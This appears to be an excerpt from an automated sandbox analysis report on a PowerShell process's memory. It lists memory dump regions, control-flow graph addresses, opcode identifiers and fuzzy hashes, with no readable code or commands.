                                                                                                                                                                            • Snapshot File: hcaresult_21_2_8d40000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3254676861-0
                                                                                                                                                                            • Opcode ID: d2b80ae624b19eb8e4e3cf6c64fc0a3890a7019f5ea0be7244e60086f22b0085
                                                                                                                                                                            • Instruction ID: 1493cf4ca2aa1004522be3968ee3f4196549b1ee9e5a98b973038da6256ad1af
                                                                                                                                                                            • Opcode Fuzzy Hash: d2b80ae624b19eb8e4e3cf6c64fc0a3890a7019f5ea0be7244e60086f22b0085
                                                                                                                                                                            • Instruction Fuzzy Hash: A91122B19002488FCB10DF9AC884B9EFFF8EB48324F24841AD558A7310C774A944CFA4

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 509 5176e28-5176e47 510 5176f4d-5176fb4 509->510 511 5176e4d-5176e50 509->511 529 5176fb6-5176fc0 510->529 530 5176fc1-5176fe6 510->530 544 5176e52 call 5176d64 511->544 545 5176e52 call 5176d7f 511->545 513 5176e58-5176e6a 514 5176e76-5176e8b 513->514 515 5176e6c 513->515 521 5176f16-5176f2f 514->521 522 5176e91-5176ea1 514->522 515->514 527 5176f31 521->527 528 5176f3a-5176f3b 521->528 524 5176ea3 522->524 525 5176ead-5176ec5 522->525 524->525 535 5176ec7-5176ed7 525->535 536 5176f05-5176f10 525->536 527->528 528->510 540 5176ff3-5176ffb 530->540 541 5176fe8-5176ff2 530->541 538 5176ef3-5176efd 535->538 539 5176ed9-5176ef1 535->539 536->521 536->522 538->536 539->536 544->513 545->513
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (bq
                                                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                                                            • Opcode ID: 4788667e0ed4405db4f731aedd8e1650eef99e8c22a1db96709a7785e0782a4a
                                                                                                                                                                            • Instruction ID: 853b8f3e1c840965a921ce19cc160b4b012a4e55152339f17dd45b4f249c6af4
                                                                                                                                                                            • Opcode Fuzzy Hash: 4788667e0ed4405db4f731aedd8e1650eef99e8c22a1db96709a7785e0782a4a
                                                                                                                                                                            • Instruction Fuzzy Hash: A0516A31B046098FCB14DFA8C564AEEBBF6EF89355F1440A9E906EB750DB389D01CB61

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 573 517b080-517b089 call 517a780 577 517b08e-517b092 573->577 578 517b094-517b0a1 577->578 579 517b0a2-517b13d 577->579 589 517b146-517b163 579->589 590 517b13f-517b145 579->590 590->589
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (&^q
                                                                                                                                                                            • API String ID: 0-2067289071
                                                                                                                                                                            • Opcode ID: 76be0df8afe00ff5f375520d713436da26a20058e70ace436f837c2394867964
                                                                                                                                                                            • Instruction ID: 00a17a2796f3609b5255e9d06b933e94a22e918ef5b88dacf548a6518b5dd00b
                                                                                                                                                                            • Opcode Fuzzy Hash: 76be0df8afe00ff5f375520d713436da26a20058e70ace436f837c2394867964
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E21BC71A082588FCB14DFAED44469EBFF5EB88320F24886ED008E7340DB759905CBA5

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1018 517cc80-517cd10 1023 517cd16-517cd21 1018->1023 1024 517cd12 1018->1024 1025 517cd26-517cd80 call 517b080 1023->1025 1026 517cd23 1023->1026 1024->1023 1033 517cd82-517cd87 1025->1033 1034 517cdd1-517cdd5 1025->1034 1026->1025 1033->1034 1037 517cd89-517cdac 1033->1037 1035 517cdd7-517cde1 1034->1035 1036 517cde6 1034->1036 1035->1036 1038 517cdeb-517cded 1036->1038 1041 517cdb2-517cdbd 1037->1041 1039 517ce12 1038->1039 1040 517cdef 1038->1040 1044 517ce1a-517ce1e 1039->1044 1045 517ce15 call 517a774 1039->1045 1046 517cdf9-517ce10 1040->1046 1042 517cdc6-517cdcf 1041->1042 1043 517cdbf-517cdc5 1041->1043 1042->1038 1043->1042 1047 517ce57-517ce86 1044->1047 1048 517ce20-517ce49 1044->1048 1045->1044 1046->1044 1048->1047
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 54a8d7a2c072452ee6f2ec7fca150b9e2b467a5ba8edb290bf8d59aa604b60b6
                                                                                                                                                                            • Instruction ID: 095ed90df2fbc9647e029d1ae300aa6a3983f29316c30a2f595cbf4bc034e415
                                                                                                                                                                            • Opcode Fuzzy Hash: 54a8d7a2c072452ee6f2ec7fca150b9e2b467a5ba8edb290bf8d59aa604b60b6
                                                                                                                                                                            • Instruction Fuzzy Hash: B261F775E002489FCB14DFA9D5846DDBBF1FF88314F14816AE809AB354DB349D85CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c70f16805777e1ee80dd8e47385e76096e0295dba2624a5f472cf9d8f3d60249
                                                                                                                                                                            • Instruction ID: 9f65df604bd843c41f2e607882a3a8d7684310cfb7e593863dd89ab63bfdf629
                                                                                                                                                                            • Opcode Fuzzy Hash: c70f16805777e1ee80dd8e47385e76096e0295dba2624a5f472cf9d8f3d60249
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B51F375E002489FCB14CFA9D584A9DBFF6FF88314F14806AE819AB354DB349D45CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e603361119cc37a65de87f6a3444462ead14e9b7cbe53ce29f1f98fc7e6b570e
                                                                                                                                                                            • Instruction ID: 914cba3e82ed06b092bb67924eee9db5b25e4b0962f8b8e8909515871dde1e09
                                                                                                                                                                            • Opcode Fuzzy Hash: e603361119cc37a65de87f6a3444462ead14e9b7cbe53ce29f1f98fc7e6b570e
                                                                                                                                                                            • Instruction Fuzzy Hash: 39418D75B002098FCB04EFADD594AAEBBF2EF89310F148469E415EB254EB359D018BA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 03938b1b42030b1f9e7caffbed6b71a79d8bc7473d7a5222e6bd71f83a722df0
                                                                                                                                                                            • Instruction ID: 40420e8d6a3361c2a1134aada797fa21b30aec860e5c68d930f69fe99a20415e
                                                                                                                                                                            • Opcode Fuzzy Hash: 03938b1b42030b1f9e7caffbed6b71a79d8bc7473d7a5222e6bd71f83a722df0
                                                                                                                                                                            • Instruction Fuzzy Hash: B741D6F4A00202DFEB258A28C648A6A7BF2EF85654F1480D5DB019F256DB3DDD85CBB1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9c99baba37dfd3aae8f1ac87cb1d254c1b4f5fd48fe15362af3d39d71ecc1356
                                                                                                                                                                            • Instruction ID: f6f3026fe226f4719620acb972bdccc55eb0799c7adbfa5dc763d112164c0b74
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c99baba37dfd3aae8f1ac87cb1d254c1b4f5fd48fe15362af3d39d71ecc1356
                                                                                                                                                                            • Instruction Fuzzy Hash: EC4118B4A005099FCB05CF59C5989AAFBB1FF48310B258599D825AB365C736FC52CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 54e1c45e9b506d92fb30d77edee96930dc1d576b69098693c0440db7b6f00d77
                                                                                                                                                                            • Instruction ID: c5b724bf87c9a62fb182d6964182ef9ad778b33edfa424183f6b691e9551004f
                                                                                                                                                                            • Opcode Fuzzy Hash: 54e1c45e9b506d92fb30d77edee96930dc1d576b69098693c0440db7b6f00d77
                                                                                                                                                                            • Instruction Fuzzy Hash: E841F5B4A005099FCB09CF59C598DBAF7B1FF48310B218559D926AB364C736FC92CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1b59e23144e7654354291eedd57a50561cdab541b8770bae972b4e61c8968026
                                                                                                                                                                            • Instruction ID: e0ea6c3fe5ff689334d6016845d81021dcc3e5841d7f80e558c89bc6b6624db1
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b59e23144e7654354291eedd57a50561cdab541b8770bae972b4e61c8968026
                                                                                                                                                                            • Instruction Fuzzy Hash: D0310834A046098FCB14DF68C668AAEBBF2EF8D315F155098E806AB750DB35DC41CB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b0d437aab47ccf565d418c014acc36e3ae37525cca19e60d9d856df2dd418e93
                                                                                                                                                                            • Instruction ID: 9bf9b99975c16954bfb904ca8a937d50b319ece36e8604ed1c437077f6a4bdde
                                                                                                                                                                            • Opcode Fuzzy Hash: b0d437aab47ccf565d418c014acc36e3ae37525cca19e60d9d856df2dd418e93
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C314570B002099BCB08DFADD494BAEBAF6AF89310F148069E415EB354EB798C418B64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5cd1b4df317eb34526f6bee320c05ebe7fd59669d932ed4b54367290990603da
                                                                                                                                                                            • Instruction ID: 9d484d97bf20a0ff1cc31c9bbdf45cc65bd43cd3d80574f2c4f5c8f02d27f4ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd1b4df317eb34526f6bee320c05ebe7fd59669d932ed4b54367290990603da
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D3161B4B002099FDB04EF64D858AFFB7B3EF84300F1188A9D514AB395DB39AD418B91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e7093d782610f584ad19ec73ce9eb8f7473222c5d6f5476edf081fffeb271fd2
                                                                                                                                                                            • Instruction ID: 89d61cf3edee6b8f01e500fb152e62e0e447cf4b916c2d6a606aa2e6ef2d3dba
                                                                                                                                                                            • Opcode Fuzzy Hash: e7093d782610f584ad19ec73ce9eb8f7473222c5d6f5476edf081fffeb271fd2
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A3161749053888EDB60CF6EC0887DABFF6EB84324F28C45ED44D9B215C774A485CB65
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6ef353d662d206f25a1d739296b203c22ffcee0b9b48cac75c461ba6d7fb2db5
                                                                                                                                                                            • Instruction ID: 1398ec1374ab769009b1473ed695205415f3a53dc95789f947b7fefb579786d7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ef353d662d206f25a1d739296b203c22ffcee0b9b48cac75c461ba6d7fb2db5
                                                                                                                                                                            • Instruction Fuzzy Hash: 303132B4F002099FDB04EF64D458BEFB7B2EF84300F1188A9D615AB394DA39AD418B91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 534ad574aa1c36745213a6de8d934ccc19a6965c6222ce21674d80df4571a99a
                                                                                                                                                                            • Instruction ID: a33c7842669da06ad20ebe2b040a21bdb034645b1631629066e71af3cc464a6b
                                                                                                                                                                            • Opcode Fuzzy Hash: 534ad574aa1c36745213a6de8d934ccc19a6965c6222ce21674d80df4571a99a
                                                                                                                                                                            • Instruction Fuzzy Hash: 1321F175504201DFCB05DF14E9C1F2ABFB6FB88314F20C5A9ED094A256C376D456CB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c6f56b9c70a080d8810f8812b9446a51de4c482afb7cc5c5d48fc67d2e8ad5a2
                                                                                                                                                                            • Instruction ID: 6c0302e94455ff4c5aede24d2606784b5202bec38d0f16df8e1577df7d77781e
                                                                                                                                                                            • Opcode Fuzzy Hash: c6f56b9c70a080d8810f8812b9446a51de4c482afb7cc5c5d48fc67d2e8ad5a2
                                                                                                                                                                            • Instruction Fuzzy Hash: D2213470604201DFDB14CF14E9C0F2EBBB6FB84354F24C66DD90A4B251C73AD846CA62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 562204eab34d584f7e4c6a04a535c07eb6cf968972c7156cf63030e29e4882e0
                                                                                                                                                                            • Instruction ID: 33ab76c7c57cc6d35e04684c407b6687476fab794badea8cebe1866c057ce1d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 562204eab34d584f7e4c6a04a535c07eb6cf968972c7156cf63030e29e4882e0
                                                                                                                                                                            • Instruction Fuzzy Hash: BC2157B09053488EDB60CF6EC08879AFBF6EB88324F28C02AD85E97205D77464858B64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 287ba26cf6302c1213f5fb5f2efbd990a5ef2e6563418382f66b7ad57d7d0d52
                                                                                                                                                                            • Instruction ID: 8ccc7d577eca53f72c6abb85d71e9eb6e44b63d34f3ea26cbc448b324df95655
                                                                                                                                                                            • Opcode Fuzzy Hash: 287ba26cf6302c1213f5fb5f2efbd990a5ef2e6563418382f66b7ad57d7d0d52
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F1170353042149FD704DB69E884D6FBBEAFBC87507244569E509C7355DF35DC018B90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a70cc1c3a7994ca142a5d3982906586ef833b173abafcb457253b91e479c28f1
                                                                                                                                                                            • Instruction ID: 74a86741461c452221c3a822b5d103c12b095064e97d796e699ec25d88ba4770
                                                                                                                                                                            • Opcode Fuzzy Hash: a70cc1c3a7994ca142a5d3982906586ef833b173abafcb457253b91e479c28f1
                                                                                                                                                                            • Instruction Fuzzy Hash: AB112B39700128CFCB04DBACE9449EE77F6FBC8215B0540A5E909EB324DB35DD458B90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 55a0a897d162a48aa1695d0807ea48ae9272d7b6d465b85a1d878dd059377f2e
                                                                                                                                                                            • Instruction ID: 03226d748875a4bae4cfe4a879a2aff3e34176d460b449b707480d4305cbe1cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 55a0a897d162a48aa1695d0807ea48ae9272d7b6d465b85a1d878dd059377f2e
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C219D76504241DFCB06CF10E9C4B26BFB2FB84318F24C5AADD094A256C33AD46ACBA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dfb69699e82f8749078797bbb1e26de38cb25b611a27f389bbf9743ae2ba0f89
                                                                                                                                                                            • Instruction ID: cb535ba5e4c48327b22fe927bc010c9094e4e3d03b4b0a3ca15daf939f9de95d
                                                                                                                                                                            • Opcode Fuzzy Hash: dfb69699e82f8749078797bbb1e26de38cb25b611a27f389bbf9743ae2ba0f89
                                                                                                                                                                            • Instruction Fuzzy Hash: 6E117975504280DFDB16CF14E9C4B29BBB2FB84214F28C6AADC494B656C33AD44ACF62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 33f2ceea629a02465628e4ac283173438b266f495b38c08f4e4e45cfc36bc152
                                                                                                                                                                            • Instruction ID: e946be0e276d0edcf9500b7e5cc3a0a1514234db46eecb2647371e5aa1cbced8
                                                                                                                                                                            • Opcode Fuzzy Hash: 33f2ceea629a02465628e4ac283173438b266f495b38c08f4e4e45cfc36bc152
                                                                                                                                                                            • Instruction Fuzzy Hash: 22111734204B50CFC728DF79D48185ABBF6EF8921532489ADD08A8B7A0DB36EC42CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 210b3850ce87642830810233dd6cc9bd074d6af6f3419133e271ac6b9eea06a3
                                                                                                                                                                            • Instruction ID: b7770ed534e4e925391b3b5223d78f6ba5db39f057b26c68c23b918c39c36fca
                                                                                                                                                                            • Opcode Fuzzy Hash: 210b3850ce87642830810233dd6cc9bd074d6af6f3419133e271ac6b9eea06a3
                                                                                                                                                                            • Instruction Fuzzy Hash: 13015E7200D3D09EE7164B259C94766BFA8EF42224F18859BE9888F1A7C2699C46C772
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 101d571f0f4930b7d829993483a892a41cff14b6b3151d45a5bd27dea23b33f3
                                                                                                                                                                            • Instruction ID: b0aceae311a0075a2e0537aec37032a8b964c5e1c5333b0035068ad29fb1be50
                                                                                                                                                                            • Opcode Fuzzy Hash: 101d571f0f4930b7d829993483a892a41cff14b6b3151d45a5bd27dea23b33f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3701F7320083509AE7108A25D9C4B6FBFD8EF41324F48C529ED494A196C279DC42C6B2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 162111df11139975a7f5528cc831654e47d4e7b65a939082e9c308f40b0892f9
                                                                                                                                                                            • Instruction ID: 4777f89c122a1d8b8638d74ef33dbabe7092c456054d659b82b5c9a55888deb4
                                                                                                                                                                            • Opcode Fuzzy Hash: 162111df11139975a7f5528cc831654e47d4e7b65a939082e9c308f40b0892f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B018BB0904B598FCB249F6DA5086AEBFF0EF48304B40C92EE4AED7741C374A5048B81
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e727be5026f191d642e9276e9d3baf25d7d08a5ff93d3a4a3b7ac014d0abfbd8
                                                                                                                                                                            • Instruction ID: 69f2562fa9f104adcbe7741022504943aebc2b71d8cb47e9fcf573ea9e9e8ba2
                                                                                                                                                                            • Opcode Fuzzy Hash: e727be5026f191d642e9276e9d3baf25d7d08a5ff93d3a4a3b7ac014d0abfbd8
                                                                                                                                                                            • Instruction Fuzzy Hash: BD0126306082044BC311AB39D4183DF7BB6EFC6228F0480AAC9054B286CA3A284AC7A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a64be863f56ee94b9f09349b60b02b43d6cb02f4278bfe9a8f327561948d43aa
                                                                                                                                                                            • Instruction ID: 6a4a59edfbd988bfca47bb6d704a29bf331444663ffcee9c70ea3e84781d2daa
                                                                                                                                                                            • Opcode Fuzzy Hash: a64be863f56ee94b9f09349b60b02b43d6cb02f4278bfe9a8f327561948d43aa
                                                                                                                                                                            • Instruction Fuzzy Hash: 19F05E353046498FC7149A1CE858C25BBF6EFCB662B1640AAF549CB376CB21DC008791
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2444534463.000000000502D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0502D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_502d000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2889e2dfa912f12df0a751ec29dd398079274e0ae4c658dda9523768ef6eb824
                                                                                                                                                                            • Instruction ID: 661ee840e5e9162d100b7437352791e7f2671c861313030b1d21ff8568860da1
                                                                                                                                                                            • Opcode Fuzzy Hash: 2889e2dfa912f12df0a751ec29dd398079274e0ae4c658dda9523768ef6eb824
